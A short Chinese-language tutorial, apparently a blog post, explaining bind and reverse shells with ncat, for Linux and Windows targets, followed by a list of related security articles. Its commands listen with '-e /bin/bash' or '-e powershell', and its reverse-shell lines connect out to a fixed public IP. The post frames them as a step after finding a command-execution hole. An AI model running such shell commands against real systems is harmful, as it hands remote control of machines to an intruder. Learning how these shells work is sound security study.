正反向shell

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

shell 复制代码
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

shell 复制代码
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

shell 复制代码
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

shell 复制代码
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

相关推荐
Root_Hacker2 小时前
sql注入学习笔记
数据库·sql·web安全·网络安全·oracle·网络攻击模型
青岑CTF4 小时前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
HaiLang_IT6 小时前
网络安全与执法专业【精选选题表】优质选题参考
安全·web安全·php
青岑CTF7 小时前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全
毕设源码-朱学姐8 小时前
【开题答辩全过程】以 基于python网络安全知识在线答题系统为例,包含答辩的问题和答案
开发语言·python·web安全
瘾大侠8 小时前
HTB赛季10 - Facts
网络·安全·web安全·网络安全
刚刚入门的菜鸟20 小时前
php-curl
运维·web安全·php
Teame_1 天前
渗透课程学习总结
网络·安全·web安全
千寻技术帮1 天前
10404_基于Web的校园网络安全防御系统
网络·mysql·安全·web安全·springboot
浩浩测试一下1 天前
WAF绕过之编码绕过特性篇
计算机网络·web安全·网络安全·网络攻击模型·安全威胁分析·安全架构